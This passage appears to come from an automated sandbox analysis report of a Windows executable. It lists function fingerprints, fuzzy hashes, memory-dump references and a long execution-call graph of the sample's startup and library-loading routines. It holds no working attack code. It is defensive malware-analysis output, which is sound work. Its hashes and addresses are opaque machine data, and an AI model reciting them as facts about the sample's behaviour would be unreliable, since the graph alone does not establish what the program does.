                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD41D632B18B5181EB60DF25E4443BAABA5FB98B84F804132EE4D87798EF3CD401CB51
                                                                                                                                                                                                                              Function 00007FF7EAD1F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                              • Instruction ID: e5a636bf4574df351d9f193d1bc54ae2bd4c38df9f6831aaec94935af671b0e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9421C362B0864181FB20EB21D04436DA3E1FBA8B44FC5417BD69D43698DF7CE545CB62
                                                                                                                                                                                                                              Function 00007FF7EAD0FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction ID: 0f7d24ecbdfb765eea94364325dd8b81555a85adc87ed2c9e4b4c66f6e34aa2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E112E32618B8182EB61DF15E44035AB7E5FB88B98F684671DB8D07758DF3CD551CB10
                                                                                                                                                                                                                              Function 00007FF7EAD2073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction ID: 6ac71f684b0196dc91a5adc0b388a21a3753f3f1d86e1d51e424bfae0a360557
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F018F6291C20686F721FF60946537EA3A0EF58745FC10077D54D83699DE7CE904CB36

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:2.5%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:2%
                                                                                                                                                                                                                              Total number of Nodes:791
                                                                                                                                                                                                                              Total number of Limit Nodes:29
                                                                                                                                                                                                                              execution_graph 74801 7ff7ead0cc3c 74822 7ff7ead0ce0c 74801->74822 74804 7ff7ead0cd88 74973 7ff7ead0d12c 7 API calls 2 library calls 74804->74973 74805 7ff7ead0cc58 __scrt_acquire_startup_lock 74807 7ff7ead0cd92 74805->74807 74810 7ff7ead0cc76 __scrt_release_startup_lock 74805->74810 74974 7ff7ead0d12c 7 API calls 2 library calls 74807->74974 74809 7ff7ead0cc9b 74810->74809 74812 7ff7ead0cd21 74810->74812 74970 7ff7ead19b2c 45 API calls 74810->74970 74811 7ff7ead0cd9d __FrameHandler3::FrameUnwindToEmptyState 74828 7ff7ead0d274 74812->74828 74814 7ff7ead0cd26 74831 7ff7ead01000 74814->74831 74819 7ff7ead0cd49 74819->74811 74972 7ff7ead0cf90 7 API calls 74819->74972 74821 7ff7ead0cd60 74821->74809 74823 7ff7ead0ce14 74822->74823 74824 7ff7ead0ce20 __scrt_dllmain_crt_thread_attach 74823->74824 74825 7ff7ead0cc50 74824->74825 74826 7ff7ead0ce2d 74824->74826 74825->74804 74825->74805 74826->74825 74975 7ff7ead0d888 7 API calls 2 library calls 74826->74975 74976 7ff7ead2a4d0 74828->74976 74830 7ff7ead0d28b GetStartupInfoW 74830->74814 74832 7ff7ead01009 74831->74832 74978 7ff7ead15484 74832->74978 74834 7ff7ead037fb 74985 7ff7ead036b0 74834->74985 74837 7ff7ead03808 __vcrt_freefls 75122 7ff7ead0c550 74837->75122 74842 7ff7ead0383c 75084 7ff7ead01c80 74842->75084 74843 7ff7ead0391b 75089 7ff7ead045c0 74843->75089 74847 7ff7ead0385b 75057 7ff7ead08830 74847->75057 74849 7ff7ead0396a 75112 7ff7ead02710 54 API calls _log10_special 74849->75112 74850 7ff7ead0388e 74860 7ff7ead038bb __vcrt_freefls 74850->74860 75088 7ff7ead089a0 40 API calls __vcrt_freefls 74850->75088 74853 7ff7ead0395d 74854 7ff7ead03984 74853->74854 74855 7ff7ead03962 74853->74855 74856 7ff7ead01c80 49 API calls 74854->74856 75108 7ff7ead1004c 74855->75108 74859 7ff7ead039a3 74856->74859 74864 7ff7ead01950 115 API calls 74859->74864 74861 7ff7ead08830 14 API calls 74860->74861 74870 7ff7ead038de __vcrt_freefls 74860->74870 74861->74870 74863 7ff7ead03a0b 75115 7ff7ead089a0 40 API calls __vcrt_freefls 74863->75115 74866 7ff7ead039ce 74864->74866 74866->74847 74869 7ff7ead039de 74866->74869 74867 7ff7ead03a17 75116 7ff7ead089a0 40 API calls __vcrt_freefls 74867->75116 75113 7ff7ead02710 54 API calls _log10_special 74869->75113 74874 7ff7ead0390e __vcrt_freefls 74870->74874 75114 7ff7ead08940 40 API calls __vcrt_freefls 74870->75114 74871 7ff7ead03a23 75117 7ff7ead089a0 40 API calls __vcrt_freefls 74871->75117 74875 7ff7ead08830 14 API calls 74874->74875 74876 7ff7ead03a3b 74875->74876 74877 7ff7ead03b2f 74876->74877 74878 7ff7ead03a60 __vcrt_freefls 74876->74878 75119 7ff7ead02710 54 API calls _log10_special 74877->75119 74883 7ff7ead03aab 74878->74883 75118 7ff7ead08940 40 API calls __vcrt_freefls 74878->75118 74881 7ff7ead08830 14 API calls 74882 7ff7ead03bf4 __vcrt_freefls 74881->74882 74884 7ff7ead03c46 74882->74884 74885 7ff7ead03d41 74882->74885 74883->74881 74886 7ff7ead03cd4 74884->74886 74887 7ff7ead03c50 74884->74887 75133 7ff7ead044e0 49 API calls 74885->75133 74890 7ff7ead08830 14 API calls 74886->74890 75120 7ff7ead090e0 59 API calls _log10_special 74887->75120 74893 7ff7ead03ce0 74890->74893 74891 7ff7ead03d4f 74894 7ff7ead03d65 74891->74894 74895 7ff7ead03d71 74891->74895 74892 7ff7ead03c55 74898 7ff7ead03cb3 74892->74898 74899 7ff7ead03c61 74892->74899 74893->74899 74900 7ff7ead03ced 74893->74900 75134 7ff7ead04630 74894->75134 74897 7ff7ead01c80 49 API calls 74895->74897 74911 7ff7ead03d2b __vcrt_freefls 74897->74911 75131 7ff7ead08660 86 API calls 2 library calls 74898->75131 75121 7ff7ead02710 54 API calls _log10_special 74899->75121 74903 7ff7ead01c80 49 API calls 74900->74903 74906 7ff7ead03d0b 74903->74906 74904 7ff7ead03dc4 75070 7ff7ead09390 74904->75070 74905 7ff7ead03cbb 74908 7ff7ead03cbf 74905->74908 74909 7ff7ead03cc8 74905->74909 74910 7ff7ead03d12 74906->74910 74906->74911 74908->74899 74909->74911 75132 7ff7ead02710 54 API calls _log10_special 74910->75132 74911->74904 74912 7ff7ead03da7 SetDllDirectoryW LoadLibraryExW 74911->74912 74912->74904 74913 7ff7ead03dd7 SetDllDirectoryW 74916 7ff7ead03e0a 74913->74916 74958 7ff7ead03e5a 74913->74958 74918 7ff7ead08830 14 API calls 74916->74918 74917 7ff7ead04008 74920 7ff7ead04035 74917->74920 74921 7ff7ead04012 PostMessageW GetMessageW 74917->74921 74925 7ff7ead03e16 __vcrt_freefls 74918->74925 74919 7ff7ead03f1b 75145 7ff7ead033c0 121 API calls 2 library calls 74919->75145 75075 7ff7ead03360 74920->75075 74921->74920 74923 7ff7ead03f23 74923->74837 74926 7ff7ead03f2b 74923->74926 74928 7ff7ead03ef2 74925->74928 74932 7ff7ead03e4e 74925->74932 75146 7ff7ead090c0 LocalFree 74926->75146 75144 7ff7ead08940 40 API calls __vcrt_freefls 74928->75144 74932->74958 75137 7ff7ead06dc0 54 API calls _get_daylight 74932->75137 74936 7ff7ead0404f 75148 7ff7ead06fc0 FreeLibrary 74936->75148 74940 7ff7ead0405b 74943 7ff7ead03e6c 75138 7ff7ead07340 117 API calls 2 library calls 74943->75138 74946 7ff7ead03e81 74949 7ff7ead03ea2 74946->74949 74961 7ff7ead03e85 74946->74961 75139 7ff7ead06e00 120 API calls _log10_special 74946->75139 74949->74961 75140 7ff7ead071b0 125 API calls 74949->75140 74953 7ff7ead03ee0 75143 7ff7ead06fc0 FreeLibrary 74953->75143 74954 7ff7ead03eb7 74954->74961 75141 7ff7ead074f0 55 API calls 74954->75141 74958->74917 74958->74919 74961->74958 75142 7ff7ead02a50 54 API calls _log10_special 74961->75142 74970->74812 74971 7ff7ead0d2b8 GetModuleHandleW 74971->74819 74972->74821 74973->74807 74974->74811 74975->74825 74977 7ff7ead2a4c0 74976->74977 74977->74830 74977->74977 74981 7ff7ead1f480 74978->74981 74979 7ff7ead1f4d3 75149 7ff7ead1a814 37 API calls 2 library calls 74979->75149 74981->74979 74983 7ff7ead1f526 74981->74983 74982 7ff7ead1f4fc 74982->74834 75150 7ff7ead1f358 71 API calls _fread_nolock 74983->75150 75151 7ff7ead0c850 74985->75151 74988 7ff7ead03710 75153 7ff7ead09280 FindFirstFileExW 74988->75153 74989 7ff7ead036eb GetLastError 75158 7ff7ead02c50 51 API calls _log10_special 74989->75158 74993 7ff7ead03706 74997 7ff7ead0c550 _log10_special 8 API calls 74993->74997 74994 7ff7ead03723 75159 7ff7ead09300 CreateFileW GetFinalPathNameByHandleW CloseHandle 74994->75159 74995 7ff7ead0377d 75161 7ff7ead09440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 74995->75161 75000 7ff7ead037b5 74997->75000 74999 7ff7ead03730 75002 7ff7ead03734 74999->75002 75003 7ff7ead0374c __vcrt_InitializeCriticalSectionEx 74999->75003 75000->74837 75007 7ff7ead01950 75000->75007 75001 7ff7ead0378b 75001->74993 75162 7ff7ead02810 49 API calls _log10_special 75001->75162 75160 7ff7ead02810 49 API calls _log10_special 75002->75160 75003->74995 75006 7ff7ead03745 75006->74993 75008 7ff7ead045c0 108 API calls 75007->75008 75009 7ff7ead01985 75008->75009 75010 7ff7ead01c43 75009->75010 75011 7ff7ead07f90 83 API calls 75009->75011 75012 7ff7ead0c550 _log10_special 8 API calls 75010->75012 75014 7ff7ead019cb 75011->75014 75013 7ff7ead01c5e 75012->75013 75013->74842 75013->74843 75056 7ff7ead01a03 75014->75056 75163 7ff7ead106d4 75014->75163 75016 7ff7ead1004c 74 API calls 75016->75010 75017 7ff7ead019e5 75018 7ff7ead019e9 75017->75018 75019 7ff7ead01a08 75017->75019 75170 7ff7ead14f08 11 API calls _get_daylight 75018->75170 75167 7ff7ead1039c 75019->75167 75023 7ff7ead019ee 75171 7ff7ead02910 54 API calls _log10_special 75023->75171 75024 7ff7ead01a26 75172 7ff7ead14f08 11 API calls _get_daylight 75024->75172 75025 7ff7ead01a45 75030 7ff7ead01a5c 75025->75030 75031 7ff7ead01a7b 75025->75031 75028 7ff7ead01a2b 75173 7ff7ead02910 54 API calls _log10_special 75028->75173 75174 7ff7ead14f08 11 API calls _get_daylight 75030->75174 75032 7ff7ead01c80 49 API calls 75031->75032 75034 7ff7ead01a92 75032->75034 75036 7ff7ead01c80 49 API calls 75034->75036 75035 7ff7ead01a61 75175 7ff7ead02910 54 API calls _log10_special 75035->75175 75038 7ff7ead01add 75036->75038 75039 7ff7ead106d4 73 API calls 75038->75039 75040 7ff7ead01b01 75039->75040 75041 7ff7ead01b16 75040->75041 75042 7ff7ead01b35 75040->75042 75176 7ff7ead14f08 11 API calls _get_daylight 75041->75176 75043 7ff7ead1039c _fread_nolock 53 API calls 75042->75043 75045 7ff7ead01b4a 75043->75045 75047 7ff7ead01b50 75045->75047 75048 7ff7ead01b6f 75045->75048 75046 7ff7ead01b1b 75177 7ff7ead02910 54 API calls _log10_special 75046->75177 75178 7ff7ead14f08 11 API calls _get_daylight 75047->75178 75180 7ff7ead10110 37 API calls 2 library calls 75048->75180 75052 7ff7ead01b55 75179 7ff7ead02910 54 API calls _log10_special 75052->75179 75053 7ff7ead01b89 75053->75056 75181 7ff7ead02710 54 API calls _log10_special 75053->75181 75056->75016 75058 7ff7ead0883a 75057->75058 75059 7ff7ead09390 2 API calls 75058->75059 75060 7ff7ead08859 GetEnvironmentVariableW 75059->75060 75061 7ff7ead088c2 75060->75061 75062 7ff7ead08876 ExpandEnvironmentStringsW 75060->75062 75064 7ff7ead0c550 _log10_special 8 API calls 75061->75064 75062->75061 75063 7ff7ead08898 75062->75063 75211 7ff7ead09440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 75063->75211 75066 7ff7ead088d4 75064->75066 75066->74850 75067 7ff7ead088aa 75068 7ff7ead0c550 _log10_special 8 API calls 75067->75068 75069 7ff7ead088ba 75068->75069 75069->74850 75071 7ff7ead093b2 MultiByteToWideChar 75070->75071 75072 7ff7ead093d6 75070->75072 75071->75072 75074 7ff7ead093ec __vcrt_freefls 75071->75074 75073 7ff7ead093f3 MultiByteToWideChar 75072->75073 75072->75074 75073->75074 75074->74913 75212 7ff7ead06360 75075->75212 75078 7ff7ead03399 75147 7ff7ead03670 FreeLibrary 75078->75147 75080 7ff7ead03381 75080->75078 75280 7ff7ead06050 75080->75280 75082 7ff7ead0338d 75082->75078 75289 7ff7ead061e0 54 API calls 75082->75289 75085 7ff7ead01ca5 75084->75085 75428 7ff7ead14984 75085->75428 75088->74860 75090 7ff7ead045cc 75089->75090 75091 7ff7ead09390 2 API calls 75090->75091 75092 7ff7ead045f4 75091->75092 75093 7ff7ead09390 2 API calls 75092->75093 75094 7ff7ead04607 75093->75094 75451 7ff7ead15f94 75094->75451 75097 7ff7ead0c550 _log10_special 8 API calls 75098 7ff7ead0392b 75097->75098 75098->74849 75099 7ff7ead07f90 75098->75099 75100 7ff7ead07fb4 75099->75100 75101 7ff7ead106d4 73 API calls 75100->75101 75106 7ff7ead0808b __vcrt_freefls 75100->75106 75102 7ff7ead07fd0 75101->75102 75102->75106 75619 7ff7ead178c8 75102->75619 75104 7ff7ead106d4 73 API calls 75107 7ff7ead07fe5 75104->75107 75105 7ff7ead1039c _fread_nolock 53 API calls 75105->75107 75106->74853 75107->75104 75107->75105 75107->75106 75109 7ff7ead1007c 75108->75109 75635 7ff7ead0fe28 75109->75635 75111 7ff7ead10095 75111->74849 75112->74837 75113->74837 75114->74863 75115->74867 75116->74871 75117->74874 75118->74883 75119->74837 75120->74892 75121->74837 75124 7ff7ead0c559 75122->75124 75123 7ff7ead03ca7 75123->74971 75124->75123 75125 7ff7ead0c8e0 IsProcessorFeaturePresent 75124->75125 75126 7ff7ead0c8f8 75125->75126 75647 7ff7ead0cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 75126->75647 75128 7ff7ead0c90b 75648 7ff7ead0c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 75128->75648 75131->74905 75132->74837 75133->74891 75135 7ff7ead01c80 49 API calls 75134->75135 75136 7ff7ead04660 75135->75136 75136->74911 75137->74943 75138->74946 75139->74949 75140->74954 75141->74961 75142->74953 75143->74958 75144->74958 75145->74923 75147->74936 75148->74940 75149->74982 75150->74982 75152 7ff7ead036bc GetModuleFileNameW 75151->75152 75152->74988 75152->74989 75154 7ff7ead092bf FindClose 75153->75154 75155 7ff7ead092d2 75153->75155 75154->75155 75156 7ff7ead0c550 _log10_special 8 API calls 75155->75156 75157 7ff7ead0371a 75156->75157 75157->74994 75157->74995 75158->74993 75159->74999 75160->75006 75161->75001 75162->74993 75164 7ff7ead10704 75163->75164 75182 7ff7ead10464 75164->75182 75166 7ff7ead1071d 75166->75017 75195 7ff7ead103bc 75167->75195 75170->75023 75171->75056 75172->75028 75173->75056 75174->75035 75175->75056 75176->75046 75177->75056 75178->75052 75179->75056 75180->75053 75181->75056 75183 7ff7ead104ce 75182->75183 75184 7ff7ead1048e 75182->75184 75183->75184 75185 7ff7ead104da 75183->75185 75194 7ff7ead1a814 37 API calls 2 library calls 75184->75194 75193 7ff7ead1546c EnterCriticalSection 75185->75193 75188 7ff7ead104b5 75188->75166 75189 7ff7ead104df 75190 7ff7ead105e8 71 API calls 75189->75190 75191 7ff7ead104f1 75190->75191 75192 7ff7ead15478 _fread_nolock LeaveCriticalSection 75191->75192 75192->75188 75194->75188 75196 7ff7ead01a20 75195->75196 75197 7ff7ead103e6 75195->75197 75196->75024 75196->75025 75197->75196 75198 7ff7ead10432 75197->75198 75199 7ff7ead103f5 __scrt_get_show_window_mode 75197->75199 75208 7ff7ead1546c EnterCriticalSection 75198->75208 75209 7ff7ead14f08 11 API calls _get_daylight 75199->75209 75202 7ff7ead1043a 75204 7ff7ead1013c _fread_nolock 51 API calls 75202->75204 75203 7ff7ead1040a 75210 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75203->75210 75206 7ff7ead10451 75204->75206 75207 7ff7ead15478 _fread_nolock LeaveCriticalSection 75206->75207 75207->75196 75209->75203 75210->75196 75211->75067 75213 7ff7ead06375 75212->75213 75214 7ff7ead01c80 49 API calls 75213->75214 75215 7ff7ead063b1 75214->75215 75216 7ff7ead063dd 75215->75216 75217 7ff7ead063ba 75215->75217 75219 7ff7ead04630 49 API calls 75216->75219 75300 7ff7ead02710 54 API calls _log10_special 75217->75300 75220 7ff7ead063f5 75219->75220 75221 7ff7ead06413 75220->75221 75301 7ff7ead02710 54 API calls _log10_special 75220->75301 75290 7ff7ead04560 75221->75290 75222 7ff7ead0c550 _log10_special 8 API calls 75225 7ff7ead0336e 75222->75225 75225->75078 75243 7ff7ead06500 75225->75243 75227 7ff7ead0642b 75229 7ff7ead04630 49 API calls 75227->75229 75228 7ff7ead08e80 3 API calls 75228->75227 75230 7ff7ead06444 75229->75230 75231 7ff7ead06469 75230->75231 75232 7ff7ead06449 75230->75232 75296 7ff7ead08e80 75231->75296 75302 7ff7ead02710 54 API calls _log10_special 75232->75302 75235 7ff7ead063d3 75235->75222 75236 7ff7ead06476 75237 7ff7ead06482 75236->75237 75238 7ff7ead064c1 75236->75238 75240 7ff7ead09390 2 API calls 75237->75240 75304 7ff7ead05830 137 API calls 75238->75304 75241 7ff7ead0649a GetLastError 75240->75241 75303 7ff7ead02c50 51 API calls _log10_special 75241->75303 75305 7ff7ead05400 75243->75305 75245 7ff7ead06526 75246 7ff7ead0653f 75245->75246 75247 7ff7ead0652e 75245->75247 75312 7ff7ead04c90 75246->75312 75330 7ff7ead02710 54 API calls _log10_special 75247->75330 75251 7ff7ead0655c 75255 7ff7ead0656c 75251->75255 75257 7ff7ead0657d 75251->75257 75252 7ff7ead0654b 75331 7ff7ead02710 54 API calls _log10_special 75252->75331 75254 7ff7ead0653a 75254->75080 75332 7ff7ead02710 54 API calls _log10_special 75255->75332 75258 7ff7ead065ad 75257->75258 75259 7ff7ead0659c 75257->75259 75261 7ff7ead065cd 75258->75261 75262 7ff7ead065bc 75258->75262 75333 7ff7ead02710 54 API calls _log10_special 75259->75333 75316 7ff7ead04d50 75261->75316 75334 7ff7ead02710 54 API calls _log10_special 75262->75334 75266 7ff7ead065ed 75269 7ff7ead0660d 75266->75269 75270 7ff7ead065fc 75266->75270 75267 7ff7ead065dc 75335 7ff7ead02710 54 API calls _log10_special 75267->75335 75272 7ff7ead0661f 75269->75272 75274 7ff7ead06630 75269->75274 75336 7ff7ead02710 54 API calls _log10_special 75270->75336 75337 7ff7ead02710 54 API calls _log10_special 75272->75337 75277 7ff7ead0665a 75274->75277 75338 7ff7ead172b0 73 API calls 75274->75338 75276 7ff7ead06648 75339 7ff7ead172b0 73 API calls 75276->75339 75277->75254 75340 7ff7ead02710 54 API calls _log10_special 75277->75340 75281 7ff7ead06070 75280->75281 75281->75281 75282 7ff7ead06099 75281->75282 75288 7ff7ead060b0 __vcrt_freefls 75281->75288 75372 7ff7ead02710 54 API calls _log10_special 75282->75372 75284 7ff7ead060a5 75284->75082 75285 7ff7ead061bb 75285->75082 75287 7ff7ead02710 54 API calls 75287->75288 75288->75285 75288->75287 75342 7ff7ead01470 75288->75342 75289->75078 75291 7ff7ead0456a 75290->75291 75292 7ff7ead09390 2 API calls 75291->75292 75293 7ff7ead0458f 75292->75293 75294 7ff7ead0c550 _log10_special 8 API calls 75293->75294 75295 7ff7ead045b7 75294->75295 75295->75227 75295->75228 75297 7ff7ead09390 2 API calls 75296->75297 75298 7ff7ead08e94 LoadLibraryExW 75297->75298 75299 7ff7ead08eb3 __vcrt_freefls 75298->75299 75299->75236 75300->75235 75301->75221 75302->75235 75303->75235 75304->75235 75307 7ff7ead0542c 75305->75307 75306 7ff7ead05434 75306->75245 75307->75306 75310 7ff7ead055d4 75307->75310 75341 7ff7ead16aa4 48 API calls 75307->75341 75308 7ff7ead05797 __vcrt_freefls 75308->75245 75309 7ff7ead047d0 47 API calls 75309->75310 75310->75308 75310->75309 75313 7ff7ead04cc0 75312->75313 75314 7ff7ead0c550 _log10_special 8 API calls 75313->75314 75315 7ff7ead04d2a 75314->75315 75315->75251 75315->75252 75317 7ff7ead04d65 75316->75317 75318 7ff7ead01c80 49 API calls 75317->75318 75319 7ff7ead04db1 75318->75319 75320 7ff7ead01c80 49 API calls 75319->75320 75329 7ff7ead04e33 __vcrt_freefls 75319->75329 75321 7ff7ead04df0 75320->75321 75324 7ff7ead09390 2 API calls 75321->75324 75321->75329 75322 7ff7ead0c550 _log10_special 8 API calls 75323 7ff7ead04e7e 75322->75323 75323->75266 75323->75267 75325 7ff7ead04e06 75324->75325 75326 7ff7ead09390 2 API calls 75325->75326 75327 7ff7ead04e1d 75326->75327 75328 7ff7ead09390 2 API calls 75327->75328 75328->75329 75329->75322 75330->75254 75331->75254 75332->75254 75333->75254 75334->75254 75335->75254 75336->75254 75337->75254 75338->75276 75339->75277 75340->75254 75341->75307 75343 7ff7ead045c0 108 API calls 75342->75343 75344 7ff7ead01493 75343->75344 75345 7ff7ead014bc 75344->75345 75346 7ff7ead0149b 75344->75346 75348 7ff7ead106d4 73 API calls 75345->75348 75395 7ff7ead02710 54 API calls _log10_special 75346->75395 75350 7ff7ead014d1 75348->75350 75349 7ff7ead014ab 75349->75288 75351 7ff7ead014d5 75350->75351 75352 7ff7ead014f8 75350->75352 75396 7ff7ead14f08 11 API calls _get_daylight 75351->75396 75356 7ff7ead01532 75352->75356 75357 7ff7ead01508 75352->75357 75354 7ff7ead014da 75397 7ff7ead02910 54 API calls _log10_special 75354->75397 75359 7ff7ead01538 75356->75359 75367 7ff7ead0154b 75356->75367 75398 7ff7ead14f08 11 API calls _get_daylight 75357->75398 75373 7ff7ead01210 75359->75373 75360 7ff7ead01510 75399 7ff7ead02910 54 API calls _log10_special 75360->75399 75362 7ff7ead014f3 __vcrt_freefls 75364 7ff7ead1004c 74 API calls 75362->75364 75366 7ff7ead015c4 75364->75366 75365 7ff7ead1039c _fread_nolock 53 API calls 75365->75367 75366->75288 75367->75362 75367->75365 75368 7ff7ead015d6 75367->75368 75400 7ff7ead14f08 11 API calls _get_daylight 75368->75400 75370 7ff7ead015db 75401 7ff7ead02910 54 API calls _log10_special 75370->75401 75372->75284 75374 7ff7ead01268 75373->75374 75375 7ff7ead0126f 75374->75375 75376 7ff7ead01297 75374->75376 75406 7ff7ead02710 54 API calls _log10_special 75375->75406 75379 7ff7ead012b1 75376->75379 75381 7ff7ead012d4 75376->75381 75378 7ff7ead01282 75378->75362 75407 7ff7ead14f08 11 API calls _get_daylight 75379->75407 75384 7ff7ead012e6 75381->75384 75394 7ff7ead01309 memcpy_s 75381->75394 75382 7ff7ead012b6 75408 7ff7ead02910 54 API calls _log10_special 75382->75408 75409 7ff7ead14f08 11 API calls _get_daylight 75384->75409 75386 7ff7ead1039c _fread_nolock 53 API calls 75386->75394 75387 7ff7ead012eb 75410 7ff7ead02910 54 API calls _log10_special 75387->75410 75389 7ff7ead10110 37 API calls 75389->75394 75390 7ff7ead012cf __vcrt_freefls 75390->75362 75391 7ff7ead013cf 75411 7ff7ead02710 54 API calls _log10_special 75391->75411 75394->75386 75394->75389 75394->75390 75394->75391 75402 7ff7ead10adc 75394->75402 75395->75349 75396->75354 75397->75362 75398->75360 75399->75362 75400->75370 75401->75362 75403 7ff7ead10b0c 75402->75403 75412 7ff7ead1082c 75403->75412 75405 7ff7ead10b2a 75405->75394 75406->75378 75407->75382 75408->75390 75409->75387 75410->75390 75411->75390 75413 7ff7ead1084c 75412->75413 75418 7ff7ead10879 75412->75418 75414 7ff7ead10881 75413->75414 75415 7ff7ead10856 75413->75415 75413->75418 75419 7ff7ead1076c 75414->75419 75426 7ff7ead1a814 37 API calls 2 library calls 75415->75426 75418->75405 75427 7ff7ead1546c EnterCriticalSection 75419->75427 75421 7ff7ead10789 75422 7ff7ead107ac 74 API calls 75421->75422 75423 7ff7ead10792 75422->75423 75424 7ff7ead15478 _fread_nolock LeaveCriticalSection 75423->75424 75425 7ff7ead1079d 75424->75425 75425->75418 75426->75418 75430 7ff7ead149de 75428->75430 75429 7ff7ead14a03 75446 7ff7ead1a814 37 API calls 2 library calls 75429->75446 75430->75429 75432 7ff7ead14a3f 75430->75432 75447 7ff7ead12c10 49 API calls _invalid_parameter_noinfo 75432->75447 75434 7ff7ead14b1c 75450 7ff7ead1a948 11 API calls 2 library calls 75434->75450 75435 7ff7ead14a2d 75436 7ff7ead0c550 _log10_special 8 API calls 75435->75436 75438 7ff7ead01cc8 75436->75438 